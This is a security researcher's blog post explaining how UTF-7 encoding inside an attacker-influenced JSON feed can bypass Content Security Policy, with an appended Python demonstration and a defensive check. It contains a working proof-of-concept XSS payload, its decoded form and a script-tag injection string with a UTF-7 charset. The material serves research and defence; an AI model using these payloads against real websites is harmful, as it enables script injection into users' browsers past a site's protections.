Bypassing CSP for fun, no profit



Author:

Gareth Heyes

@hackvertor

Published: Mon, 23 Nov 2009 08:45:19 GMT

Updated: Sat, 22 Mar 2025 15:38:14 GMT

I had fun at Confidence 2.0 CON, so I'm gonna blog about the stuff I was holding back now :)

So I figured out how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that an attacker can influence (reflected or persistent) can be used to inject script, even when the JSON feed is correctly escaped.

UTF-7 can fully encode a string, meaning you can conceal quote characters and any others. 'ABC' becomes +ACcAQQBCAEMAJw-. So if we look at a fictional JSON feed such as:- [{'friend':'something','email':'something'}]

If we can influence the "something" parts then we inject our data into the feed to bypass CSP:- [{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]

This is what the code looks like when decoded:- [{'friend':'luke','email':''}];alert('May the force be with you');[{'job':'done'}]

We then inject the data by referencing it using a script tag and a charset:-

"><script src="http://some.website/test.json" charset="utf-7"></script>

This successfully executes under CSP, bypassing its restrictions, because the code comes from the site's own domain and doesn't use inline or attribute-based XSS.
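The whole chain above, as an added example that is not part of the original post: a fully base64-encoded UTF-7 encoder of the kind whose output is shown above, a server that emits correctly escaped JSON around the attacker-supplied field, and Python's UTF-7 codec standing in for a browser honouring charset=utf-7 (that stand-in and the double-quoted feed are assumptions). The check at the end is the defender's question: does reading the feed as UTF-7 change it at all?

```python
import base64
import json

def utf7_full_encode(text: str) -> str:
    """Encode every character as one UTF-7 base64 shift block (+...-).

    RFC 2152 allows any character inside a shift block, so quotes, braces
    and semicolons can be hidden behind [A-Za-z0-9+/] only: the output
    contains nothing a JSON escaper would touch.
    """
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii")
    return "+" + b64.rstrip("=") + "-"   # UTF-7 uses no '=' padding

def utf7_decode(text: str) -> str:
    """Python's codec stands in for a browser honouring charset=utf-7."""
    return text.encode("ascii").decode("utf-7")

def build_feed(email_value: str) -> str:
    """Server side: a correctly escaped JSON feed with a user-controlled field."""
    return json.dumps([{"friend": "luke", "email": email_value}])

def is_valid_json(text: str) -> bool:
    try:
        json.loads(text)
        return True
    except ValueError:
        return False

def utf7_changes_feed(raw_feed: str) -> bool:
    """Defender check: would reading the bytes as UTF-7 alter the feed at all?
    Any '+' shift sequence trips it, which is the point: serve JSON with an
    explicit charset so a script tag's charset attribute cannot apply."""
    try:
        return utf7_decode(raw_feed) != raw_feed
    except UnicodeError:
        return True  # a malformed shift sequence is just as suspicious

# Constructed sample: the article's payload, quote style matched to json.dumps.
PAYLOAD = "\"}];alert('May the force be with you');[{\"job\":\"done"
ENCODED = utf7_full_encode(PAYLOAD)
FEED = build_feed(ENCODED)

def decoded_feed() -> str:
    """What a <script src=... charset="utf-7"> consumer would see."""
    return utf7_decode(FEED)

if __name__ == "__main__":
    print(FEED)            # valid JSON; the email field is innocuous ASCII
    print(decoded_feed())  # [{"friend": "luke", "email": ""}];alert(...);[{"job":"done"}]
    print(utf7_changes_feed(FEED))  # True
```

Serving the feed with an explicit charset in its Content-Type header makes the script tag's charset attribute irrelevant, since the response's own declaration takes precedence, and browsers that follow the WHATWG Encoding Standard no longer recognise utf-7 as a label at all.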

As always, a demo is available here:- CSP bypass
